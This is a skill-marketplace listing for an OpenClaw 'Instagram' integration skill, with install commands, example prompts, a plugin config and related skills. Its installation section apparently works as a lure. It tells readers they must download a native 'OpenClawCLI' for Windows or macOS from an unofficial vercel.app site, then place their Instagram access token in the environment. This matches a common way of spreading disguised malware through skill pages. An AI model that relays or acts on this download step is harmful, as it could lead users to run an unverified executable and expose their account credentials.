Instagram platform integration. Post content, manage stories, view insights, and engage with followers.
Why use this skill?
Enhance your social media workflow with the Instagram skill for OpenClaw. Automate posts, manage comments, and track analytics effortlessly.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/thiagoruss0/instagramjgWhat This Skill Does
The Instagram skill for OpenClaw provides a powerful, programmatic bridge between your AI agent and the Instagram platform. It is designed to streamline social media management by automating content distribution, audience engagement, and performance analytics. Whether you are an influencer, a small business owner, or a social media manager, this skill allows you to leverage AI to maintain a consistent online presence. By integrating directly with Instagram's API, the agent can handle repetitive tasks such as posting media, responding to comments, and pulling data regarding follower growth and post performance, allowing you to focus on high-level content strategy.
Installation
Before you can activate this skill, you must ensure the OpenClawCLI is installed on your local system to handle the necessary authentication protocols. Download the CLI for your specific operating system (Windows or MacOS) from https://openclawcli.vercel.app/. Once installed, configure your environment variables to grant the agent access to your account. Run the following command in your terminal: export INSTAGRAM_ACCESS_TOKEN="your_access_token". Finally, install the skill module into your environment using: clawhub install openclaw/skills/skills/thiagoruss0/instagramjg.
Use Cases
This skill is ideal for automating daily social workflows. Users can schedule visual content, monitor audience interactions, and gain actionable insights without manually opening the Instagram app. It is particularly effective for managing community engagement, as the agent can filter and process comments, and for data-driven creators who need automated reporting on their account reach and engagement metrics.
Example Prompts
- "Post this photo from my desktop with the caption: Enjoying the sunny weather in the city today #summervibes"
- "Show me the insights for my last three posts and tell me which one had the highest reach."
- "List all recent comments on my latest post and draft a polite reply for each one that isn't spam."
Tips & Limitations
To maximize the utility of this skill, ensure that your access token is valid and possesses the required permissions (scopes) for posting and reading analytics. Note that the skill operates within Instagram's rate limits; avoid excessive automated requests to prevent temporary API restrictions. Always verify the agent's draft replies before finalizing them to ensure the tone aligns with your brand identity. Since the skill relies on external API calls, ensure your network connection is stable during execution.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-thiagoruss0-instagramjg": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, data-collection
Related Skills
n8n
Manage n8n workflows and automations via API. Use when working with n8n workflows, executions, or automation tasks - listing workflows, activating/deactivating, checking execution status, manually triggering workflows, or debugging automation issues.
Read WeChat local data from SQLite databases. Supports listing contacts, chat sessions, searching messages, and viewing favorites. Use when the user needs to access their own WeChat data stored locally. Requires access to WeChat data directory. Read-only operations only.
coding-agent
Run Codex CLI, Claude Code, OpenCode, or Pi Coding Agent via background process for programmatic control.
veo3-gen
Generate and stitch short videos via Google Veo 3.x using the Gemini API (google-genai). Use when you need to create video clips from prompts (ads, UGC-style clips, product demos) and want a reproducible CLI workflow (generate, poll, download MP4, optionally stitch multiple segments).
jira
Jira API integration with managed OAuth. Search issues with JQL, create and update issues, manage projects and transitions. Use this skill when users want to interact with Jira issues, projects, or workflows. For other third party apps, use the api-gateway skill (https://clawhub.ai/byungkyu/api-gateway).